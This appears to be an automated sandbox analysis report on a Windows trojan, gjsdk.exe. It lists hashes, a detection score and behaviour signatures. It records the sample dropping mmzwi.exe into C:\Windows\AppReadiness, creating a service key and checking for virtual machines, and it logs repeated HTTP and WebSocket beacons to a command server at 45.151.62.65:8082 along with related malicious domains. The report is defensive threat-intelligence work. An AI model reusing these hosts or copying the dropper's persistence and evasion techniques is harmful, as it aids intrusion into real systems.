Windows Analysis Report
gjsdk.exe

Overview

General Information

Sample name:	gjsdk.exe
Analysis ID:	1529334
MD5:	0537541bc5c5e92570375c1178f6b8c0
SHA1:	041c02dbab31e9521f865f7e1783314364a93ec2
SHA256:	f38d1ee353a3c7f45a20a67b46bed65c4312fc24d7dcb761d800c8003d8d10e5
Infos:

Detection

Score:	52
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

AI detected suspicious sample

Drops executables to the windows directory (C:\Windows) and starts them

Uses known network protocols on non-standard ports

Creates files inside the system directory

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Drops PE files to the windows directory (C:\Windows)

PE file contains sections with non-standard names

Queries the volume information (name, serial number etc) of a device

Classification

Signatures

AV Detection

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 99.9% probability

Source: gjsdk.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Networking

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49953

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.4:49730 -> 45.151.62.65:8082

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Connection: UpgradeSec-WebSocket-Key: Mkj9i1IGcuFLi6pPiAlmsQ==Sec-WebSocket-Version: 13Upgrade: websocket
Source: global traffic	HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Connection: UpgradeSec-WebSocket-Key: GF7zLiydRprawdcGTIIheg==Sec-WebSocket-Version: 13Upgrade: websocket
Source: global traffic	HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Connection: UpgradeSec-WebSocket-Key: OUx2ht0WNPJoXjDZ6u3e2w==Sec-WebSocket-Version: 13Upgrade: websocket
Source: global traffic	HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Connection: UpgradeSec-WebSocket-Key: iEPpNfUCMB4KPKjaL5VSPQ==Sec-WebSocket-Version: 13Upgrade: websocket
Source: global traffic	HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Connection: UpgradeSec-WebSocket-Key: +Z+9VSkuyjpvQkVrx8MhxQ==Sec-WebSocket-Version: 13Upgrade: websocket
Source: global traffic	HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Connection: UpgradeSec-WebSocket-Key: C0P5MvCyAeBMUwbVkkAe/w==Sec-WebSocket-Version: 13Upgrade: websocket
Source: global traffic	HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Connection: UpgradeSec-WebSocket-Key: myJxkJJ4oaSedrcwhxGnjA==Sec-WebSocket-Version: 13Upgrade: websocket
Source: global traffic	HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Connection: UpgradeSec-WebSocket-Key: fiJuZ0206DDY4XC9dWnhuA==Sec-WebSocket-Version: 13Upgrade: websocket
Source: global traffic	HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Connection: UpgradeSec-WebSocket-Key: 7eYFrZDFqk4ipCw7Av6AyA==Sec-WebSocket-Version: 13Upgrade: websocket
Source: global traffic	HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Connection: UpgradeSec-WebSocket-Key: FH2w5nqUvChS0FqylUd82g==Sec-WebSocket-Version: 13Upgrade: websocket
Source: global traffic	HTTP traffic detected: GET /7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfkyu3R5Q-hjDLQ== HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Accept-Encoding: gzip
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: 45.151.62.65:8082User-Agent: Go-http-client/1.1Connection: UpgradeSec-WebSocket-Key: V0fRj4PL+mkXO4y7UJYUpw==Sec-WebSocket-Version: 13Upgrade: websocket

Source: global traffic

DNS traffic detected: DNS query: c4h10o.autos

Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000080000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: ftp://192.168.2.47
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000008000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s:%d/%sHTTP/1.1
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000394000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://%s:%d/%sbg-hi-bluebg-hi-magentabg-hi-cyanHTTP/1.1
Source: gjsdk.exe, 00000000.00000002.1747251241.000000C000300000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2963616316.000000C0008C6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.css
Source: gjsdk.exe, 00000000.00000002.1747251241.000000C000300000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2963616316.000000C0008C6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://.jpg
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000080000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://45.151.62.65:8082/7FBE8Vhw_Ej3wyS05Pj-_OcuPl34HeR5tlGYDglketqIsLl6CwLCyB374ln1tVW7ajwzELAFfky
Source: gjsdk.exe, 00000000.00000002.1747251241.000000C000300000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2963616316.000000C0008C6000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: http://html4/loose.dtd
Source: gjsdk.exe, 00000000.00000002.1747251241.000000C000124000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C0002DC000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/go-sql-driver/mysql/wiki/old_passwords
Source: gjsdk.exe, 00000000.00000002.1748840323.000000C00060A000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C000394000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000222000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C0000F2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signature
Source: gjsdk.exe, 00000000.00000002.1747251241.000000C000110000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C0002DE000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signatureNAME:
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C0000F2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.md#deprecated-cli-app-action-signatureeyJhbGc
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000394000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.mdMust
Source: gjsdk.exe, 00000000.00000002.1748840323.000000C00060A000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://github.com/urfave/cli/blob/main/docs/CHANGELOG.mdThe
Source: mmzwi.exe, 00000002.00000002.2963616316.000000C0008AE000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C000162000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://lockn1t3.xyz
Source: mmzwi.exe, 00000002.00000002.2962140246.000000C0005D2000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://lockn1t3.xyz--09AZ__azMMZWIODFMQ2GGOJRGRTGIM3GMY4TOYRVHBQTQZRSMZRDQNLEMVSWOZLDNNXQ
Source: mmzwi.exe, 00000002.00000002.2959142621.000000C000162000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://lockn1t3.xyz00:11:22:33:44:5500:11:22:33:44:5500:11:22:33:44:5500:11:22:33:44:5500:11:22:33:
Source: gjsdk.exe, 00000000.00000002.1748840323.000000C0005D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://lockn1t3.xyzMMZWIODFMQ2GGOJRGRTGIM3GMY4TOYRVHBQTQZRSMZRDQNLEMVSWOZLDNNXQMMZWIODFMQ2GGOJRGRTG
Source: mmzwi.exe, 00000002.00000002.2963616316.000000C000904000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://lockn1t3.xyzocelot.jython27.xyztiger.jython27.xyz00:11:22:33:44:55cecreate
Source: gjsdk.exe, 00000000.00000002.1748840323.000000C0005D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://lockn1t3.xyzsizeof(rtype)

Creates files inside the system directory

Source: C:\Users\user\Desktop\gjsdk.exe	File created: C:\Windows\AppReadiness\.840809828.tmp			Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	File created: C:\Windows\AppReadiness\.209553492.tmp			Jump to behavior

Source: classification engine

Classification label: mal52.troj.evad.winEXE@4/0@1/1

Source: C:\Windows\System32\conhost.exe

Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7508:120:WilError_03

Source: C:\Users\user\Desktop\gjsdk.exe	File opened: C:\Windows\system32\43cf6327ee4e9a51c1f22496118c7b5e2d1b5bb7f55e4e915b3b63d138789748AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA			Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	File opened: C:\Windows\system32\43d042447d465d96d1e34aed23508a3def79fdfb21cfe1f197319fae4deb3fb0AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA			Jump to behavior

Source: C:\Users\user\Desktop\gjsdk.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: gjsdk.exe, 00000000.00000002.1747251241.000000C0002CA000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C0002AC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' \|\| %Q \|\| substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: gjsdk.exe, 00000000.00000002.1747251241.000000C0002CA000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C0002AC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: gjsdk.exe, 00000000.00000002.1747251241.000000C0002CA000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C0002AC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: gjsdk.exe, 00000000.00000002.1747251241.000000C0002CA000.00000004.00001000.00020000.00000000.sdmp, mmzwi.exe, 00000002.00000002.2959142621.000000C0002AC000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);

Source: C:\Users\user\Desktop\gjsdk.exe

File read: C:\Users\user\Desktop\gjsdk.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\gjsdk.exe "C:\Users\user\Desktop\gjsdk.exe"
Source: C:\Users\user\Desktop\gjsdk.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\AppReadiness\mmzwi.exe C:\Windows\AppReadiness\mmzwi.exe
Source: unknown	Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager

Source: C:\Users\user\Desktop\gjsdk.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\gjsdk.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\gjsdk.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Users\user\Desktop\gjsdk.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: powrprof.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: umpdc.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: dhcpcsvc6.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: dhcpcsvc.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: licensemanagersvc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: licensemanager.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: clipc.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\System32\svchost.exe	Section loaded: wldp.dll	Jump to behavior

Source: gjsdk.exe

Static file information: File size 12120576 > 1048576

Source: gjsdk.exe

Static PE information: Raw size of UPX1 is bigger than: 0x100000 < 0xb8ee00

Source: gjsdk.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

PE file contains sections with non-standard names

Source: gjsdk.exe

Static PE information: section name: UPX2

Source: initial sample	Static PE information: section name: UPX0
Source: initial sample	Static PE information: section name: UPX1

Persistence and Installation Behavior

Drops executables to the windows directory (C:\Windows) and starts them

Source: unknown

Executable created and started: C:\Windows\AppReadiness\mmzwi.exe

Drops PE files to the windows directory (C:\Windows)

Source: C:\Users\user\Desktop\gjsdk.exe

PE file moved: C:\Windows\AppReadiness\mmzwi.exe

Jump to behavior

Creates or modifies windows services

Source: C:\Users\user\Desktop\gjsdk.exe

Registry key created: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\partmgr

Jump to behavior

Hooking and other Techniques for Hiding and Protection

Uses known network protocols on non-standard ports

Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49731 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49731
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49732 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49732
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49733 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49733
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49734 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49734
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49736 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49736
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49741 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49741
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49743 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49743
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49744 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49744
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49745 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49745
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49773 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49773
Source: unknown	Network traffic detected: HTTP traffic on port 49730 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49730
Source: unknown	Network traffic detected: HTTP traffic on port 49953 -> 8082
Source: unknown	Network traffic detected: HTTP traffic on port 8082 -> 49953

Source: C:\Users\user\Desktop\gjsdk.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX			Jump to behavior
Source: C:\Windows\AppReadiness\mmzwi.exe	Process information set: NOGPFAULTERRORBOX \| NOOPENFILEERRORBOX			Jump to behavior

Source: gjsdk.exe, 00000000.00000002.1747251241.000000C000160000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: KVMKVMKVMKVMGetFileTimeGetFileTypeMicrosoft HvFORMAIFFGetFullPathNameWGetLastErrorGetLogicalDrivesGetLongPathNameWGetNamedPipeInfoGetPriorityClassGetProcAddressGetProcessIdFORMAIFFVMwareVMwareGetProcessTimesXenVMMXenVMMbhyve bhyve GetStartupInfoWaudio/ai
Source: mmzwi.exe, 00000002.00000002.2955357792.0000000002441000.00000040.00000001.01000000.00000005.sdmp	Binary or memory string: <br/></ul>tbodytheadtfootstdinwhoisIPSecimap4rsyncsteamSkypeWhoIsNETSCXeroxMAILQVMNETUnifybhfhsFXP-1bhmdsVSLMPRTSPSbh611decapOnmuxArielSMPTEdsfgwalpesSMTPSss7nsaviandantzxvttpsnaretalkdripnguucpdkrcmdchcmddemonsonarVEMMIginadRUSHDnetGWrfilephoneKIOSKJSTELOBRPDROOTDIPCD3HuskyRxMonFTSRVMIMERBytexShiva3l-l1WinDDMSIMSradiocvmoncnhrpcft-0cft-1cft-2cft-3cft-4cft-5cft-6cft-7helloMMPFTSPICESlushCacheglobetroffrimslDSATPNETMLSNAPPdbrefRSMTPOrionvenusTOP/XTSILBspockWillyWinDbIPASSbruceSolveSonuswkarsqotpsAlarmUADTCaurisAISESaaftprmlnkPDnetREBOLqsoftICPv24TalkPlatoE-NetMySQLBBARSCSMS2jt400MS-LAITOSESariseMuleMCNTPA1-BSICMPDCVSupSSDTPProEdCDDBPWebSMqueuepokerIRISAHivePTrackBINKPquakeKuangyamux[E]: /hostES256ES384ES512EdDSAHS256HS384HS512RS256RS384RS512PS256PS384PS512%s=%qc(%s)
